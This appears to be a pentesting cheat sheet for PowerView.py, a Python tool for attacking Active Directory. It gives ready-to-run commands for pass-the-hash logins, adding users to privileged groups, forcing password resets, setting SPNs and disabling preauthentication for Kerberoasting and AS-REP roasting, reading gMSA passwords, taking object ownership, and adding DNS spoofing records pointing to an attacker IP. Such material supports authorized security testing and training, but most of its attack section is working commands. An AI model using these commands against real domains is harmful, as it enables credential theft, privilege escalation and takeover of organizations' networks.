🧠PowerView.py
Introduction
PowerView.py is an alternative to the fantastic original PowerView.ps1 script. Most of the modules used in PowerView are available here (some of the flags have changed). The main goal is to achieve an interactive session without having to repeatedly authenticate to LDAP.

GitHub Repository: aniqfakhrul/powerview.py - Just another Powerview alternative
Installation
Before installing PowerView.py, you need to install the required system dependencies:
sudo apt install libkrb5-dev
Then install PowerView using pip:
pip3 install powerview --break-system-packages
Usage
PowerView.py supports multiple authentication methods for connecting to Active Directory environments.
Basic Authentication (Username/Password)
powerview domain.htb/user:'password'@10.10.10.10 --dc-ip 10.10.10.10
Pass-the-Hash (PtH) Authentication
powerview domain.htb/user@10.10.10.10 -H '01e97f85894e06a5ad698f624b9a7ee9' --dc-ip 10.10.10.10
Kerberos Authentication
powerview domain.htb/user@dc.domain.htb --dc-ip 10.10.10.10 -ns dc.domain.htb -k --no-pass
Web Browser Interface
PowerView.py also provides a web interface for easier interaction:
powerview domain.htb/'user':'password'@10.10.10.10 --web --web-host 127.0.0.1 --web-port 3000
Attacking Active Directory with PowerView.py
PowerView.py provides various commands for Active Directory enumeration and exploitation. Below are some common attack scenarios and their corresponding commands.
User and Group Management
Add User to Group
Add a user to a specific domain group:
Add-DomainGroupMember -Identity 'GROUP_TARGET' -Members 'USER_TARGET'
Modify User Password
Change a user's password (requires appropriate permissions):
Set-DomainUserPassword -Identity 'user_target' -AccountPassword 'Password01!'
Add New Domain User
Create a new user in the domain:
Add-ADUser -UserName 'Gzzcoo' -UserPass 'Password01!'
Kerberoasting Attacks
Set ServicePrincipalName for Kerberoasting
Assign a ServicePrincipalName (SPN) to a user for Kerberoasting attacks. This requires GenericAll/GenericWrite permissions on the target user:
Set-DomainObject -Identity "TARGET" -Set 'servicePrincipalname=cifs/gzzcoo'
Execute Kerberoasting Attack
Perform Kerberoasting to extract service tickets:
Invoke-Kerberoast
ASREPRoasting Attacks
Enable DONT_REQ_PREAUTH for ASREPRoast
Configure a user account to not require Kerberos pre-authentication. This requires GenericAll/GenericWrite permissions on the target user:
Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=4260352'
Account Management
Enable Disabled User Account
Remove the ACCOUNTDISABLE flag to enable a disabled user account:
Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=66048'
GMSA (Group Managed Service Accounts)
Read GMSA Password
Extract Group Managed Service Account passwords:
Get-GMSA
Object Ownership and Permissions
Change Object Owner
Make a user the owner of a specific object:
Set-DomainObjectOwner -TargetIdentity 'object_target' -PrincipalIdentity 'user_target'
Computer Management
Add New Domain Computer
Create a new computer account in the domain:
Add-ADComputer -ComputerName 'Gzzcoo' -ComputerPass 'Password01!'
DNS Manipulation
Create DNS Record for Spoofing
Add a new DNS record for DNS spoofing attacks:
Add-DomainDNSRecord -RecordName '<dns_record_target>' -RecordAddress <ATTACKER_IP>
Security Considerations
When using PowerView.py for penetration testing or security assessments:
Always ensure you have proper authorization before testing
Use these tools only in authorized environments
Document all activities for reporting purposes
Follow responsible disclosure practices
Be aware of the potential impact of your actions on production systems
Troubleshooting
If you encounter issues during installation or usage:
Ensure all dependencies are properly installed
Verify network connectivity to the target domain controller
Check authentication credentials and permissions
Review error messages for specific guidance
Consult the GitHub repository for updates and known issues
Resources
Official Repository: GitHub - aniqfakhrul/powerview.py
Original PowerView: PowerSploit PowerView
Active Directory Security: Microsoft Active Directory Security Documentation
Last updated